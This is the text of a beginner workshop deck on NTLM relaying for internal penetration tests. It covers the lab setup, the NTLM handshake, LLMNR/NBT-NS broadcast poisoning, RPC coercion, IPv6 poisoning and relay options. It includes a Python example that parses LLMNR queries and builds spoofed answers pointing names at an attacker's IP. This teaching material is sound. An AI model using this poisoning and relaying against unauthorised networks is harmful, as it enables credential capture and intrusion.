Relaying 101
How to make your internal pentests pop
Jean-Francois Maes
Practical Information
• Workbook link: https://jfmaes-1.gitbook.io/ntlm-relaying-like-a-boss-get-da-before-lunch/setup
• VM downloads –
What this workshop is about / Who is this workshop for?
• This workshop is for internal pentests – no red team shenanigans here
• This workshop does not care about detection – NTLM relaying is very much a jackhammer approach, not a surgical one
• The intended audience for this workshop is beginning pentesters or people interested in learning about these attacks. If you are already comfortable with relaying attacks, this workshop is likely not for you.
Agenda
• Introducing “DA LAB”
• A “classic” internal pentest scenario – Why care about relaying anyway?
• A brief look at NTLM authentication
• Broadcast traffic = best traffic – Why is relaying still successful?
• Respond to all the things!
• All hail RPC (and IPv6)
• Relay options and gotchas
• Q&A
DA LAB
Quite a simple setup really!
- 1 Domain (ntlmrange.local)
- 1 DC – Any Windows Server OS
- 1 “FileServer” – Any Windows Server OS
- 1 “victim” – Any Windows OS
- 1 Attacker Controlled Machine (any Linux distro you want)
Configuration
JUST KIDDING
Since relaying doesn't play well in the cloud, we are going to use our local computer to run the lab. VMs can be downloaded, but you can also set them up yourself; the instructions are in the workbook.
DA LAB
• Some setup required!
• MAKE SURE your VMs are in the same subnet and can ping each other
• MAKE SURE your DC can still reach the internet: use NAT or bridged networking, point the DC's primary DNS server at the DC itself and use a well-known public resolver like 8.8.8.8 or 1.1.1.1 as the fallback DNS
• When joining the other VMs to the domain, DO NOT configure a secondary DNS server; set their only DNS server to the DC IP, otherwise domain lookups will intermittently fail
A “classic” internal pentest scenario
“You have been tasked to assess the internal security posture of Tegridy Farms.
In order to perform this assessment, Tegridy Farms has granted you permission
to come test on site as if you were a malicious insider or allows you to place an
attacker-controlled device in the network with secure remote access.”
WHAT DO YOU DO?
Thought process – What is the first step in both?
Reconnaissance
• AD objects…
• LDAP interaction required!
• If you are lucky, you can null bind (anonymous read access)
• Usually disabled though, so no creds, no recon!
• Can sometimes be partially “bypassed” by guessing usernames when the organisation uses predictable naming conventions or very short usernames like AA0000
Reconnaissance
So, if there is no null bind and no creds, AD objects are out the window...
Is there anything else we can do?
NTLM Authentication
(diagram: Client Workstation, Service / Database Server, Domain Controller)
1. Request authentication (client -> service)
2. Challenge (service -> client)
3. Response (client -> service)
4. Forward Chal + Resp (service -> domain controller)
5. Validation (domain controller)
6. Authentication granted / denied (domain controller -> service -> client)
The authenticating system uses the hashed credential to calculate a response based on the challenge sent by the server.
When the adversary obtains a challenge / response pair, offline brute force attacks can be launched to identify the hashed credential that was used to generate the response.
NTLM relaying in a nutshell
(diagram: relaying an NTLM authentication over SMB)
Broadcast Traffic = Best Traffic
• Most broadcast traffic consists of legacy name-resolution fallback protocols like LLMNR and NBT-NS
• If DNS cannot resolve a name, the system sends a broadcast/multicast message asking if anyone knows who xxx is
• All we have to do is reply that we are xxx and collect that sweet authentication request
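The LLMNR side of that reply, as an added example that is not part of the workshop or of Responder: pure Python, constructed packets, no sockets. It parses the A query a Windows host multicasts when DNS fails and builds the positive answer that points the requested name at the attacker's IP. The host name, transaction ID and address are made up; NBT-NS uses a different (NetBIOS) name encoding and is not covered here.

```python
"""LLMNR query parsing and poisoned-answer construction (added example).

Packets are built in memory; nothing is sent. In a real responder the query
arrives on UDP 5355 (multicast group 224.0.0.252) and the answer is sent back
unicast to the asking host, which then connects to the attacker's IP.
"""
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
TYPE_A, CLASS_IN = 1, 1
FLAG_QR = 0x8000  # set in responses only
HDR = ">HHHHHH"   # id, flags, qdcount, ancount, nscount, arcount (big-endian, as in DNS)


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: one length byte per label, 0x00 terminator."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode labels starting at off; returns (name, offset just past the 0x00)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointers are not handled in this example")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(txid: int, name: str) -> bytes:
    """What a Windows host multicasts when DNS cannot resolve `name`."""
    return (struct.pack(HDR, txid, 0, 1, 0, 0, 0)
            + encode_name(name) + struct.pack(">HH", TYPE_A, CLASS_IN))


def parse_query(pkt: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack(HDR, pkt[:12])
    if flags & FLAG_QR or qd != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer any A query with the attacker's address, echoing the client's ID.

    The ID must match or the client discards the reply; the question section is
    echoed as LLMNR responders do, and a short TTL keeps the poisoned entry from
    lingering in the client's cache after the engagement.
    """
    q = parse_query(query)
    if q["qtype"] != TYPE_A or q["qclass"] != CLASS_IN:
        raise ValueError("this example only answers A/IN questions")
    header = struct.pack(HDR, q["id"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack(">HH", TYPE_A, CLASS_IN)
    rdata = socket.inet_aton(attacker_ip)
    answer = (encode_name(q["name"])
              + struct.pack(">HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata)
    return header + question + answer


def parse_answer(pkt: bytes) -> dict:
    """Decode a single-answer LLMNR response (what the victim acts on)."""
    txid, flags, qd, an, ns, ar = struct.unpack(HDR, pkt[:12])
    if not flags & FLAG_QR or an != 1:
        raise ValueError("not a single-answer LLMNR response")
    _, off = decode_name(pkt, 12)
    off += 4  # skip qtype/qclass of the echoed question
    name, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    return {"id": txid, "name": name, "ttl": ttl, "ip": socket.inet_ntoa(pkt[off:off + rdlen])}


if __name__ == "__main__":
    # Constructed sample: a victim mistypes a share host, we claim to be it.
    victim_query = build_query(0x1234, "fileserver01")
    reply = build_poisoned_answer(victim_query, "10.0.0.66")
    print(parse_query(victim_query))
    print(parse_answer(reply))
```

The poisoned answer by itself yields nothing; it only steers the victim's next connection (SMB, HTTP, ...) to the attacker's listener, and it is that listener that receives the authentication request the next slides are about.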
Respond to all the things!
All hail RPC! (and IPv6)
• What if there is no broadcast traffic? Are we stuck?
• Nope. Several RPC calls can coerce a machine into authenticating to us; some have specific requirements though, such as a particular service that needs to be running, for example the Print Spooler
• If the environment is not using IPv6 but systems are still configured (the default) to solicit IPv6 configuration, we can poison that as well by answering those solicitations ourselves
Relay Options and gotchas
• Option 0: Just listen
• Option 1: Taking a dump
• Option 2: Are you wearing socks?
• Option 3: Authenticated recon baby!
• Option 4: RBCD
• Option 5: Shadow credentials
A “classic” internal pentest scenario
WHAT DO YOU DO?
RELAY ALL THE THINGS!
Q&A
SHOUTOUTS
• Hack n Do
• Bytebleeder
• Hacker Recipes
• Specterops
• Dirkjan ( and fox-it )
• MdSec
• James Forshaw
• Klezvirus
• pythonresponder
• All contributors to impacket and responder
• And many many more…